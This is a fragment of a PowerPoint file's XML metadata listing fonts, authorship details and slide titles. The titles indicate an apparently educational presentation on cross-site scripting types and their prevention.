        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2066135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5932</TotalTime>
  <Words>516</Words>
  <Application>Microsoft Office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Georgia</vt:lpstr>
      <vt:lpstr>Times New Roman</vt:lpstr>
      <vt:lpstr>Office Theme</vt:lpstr>
      <vt:lpstr>PowerPoint Presentation</vt:lpstr>
      <vt:lpstr>PowerPoint Presentation</vt:lpstr>
      <vt:lpstr>Types of XSS</vt:lpstr>
      <vt:lpstr>How to Use Cross site scripting</vt:lpstr>
      <vt:lpstr>Stored XSS </vt:lpstr>
      <vt:lpstr>Example </vt:lpstr>
      <vt:lpstr>DOM-based XSS </vt:lpstr>
      <vt:lpstr>How to prevent XSS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Umesh</dc:creator>
  <cp:lastModifiedBy>S Abhishek-AM.EN.U4CSE19147</cp:lastModifiedBy>
  <cp:revision>221</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2021-03-13T15:07:52Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2022-10-11T10:15:49Z</dcterms:modified>
</cp:coreProperties>
</file>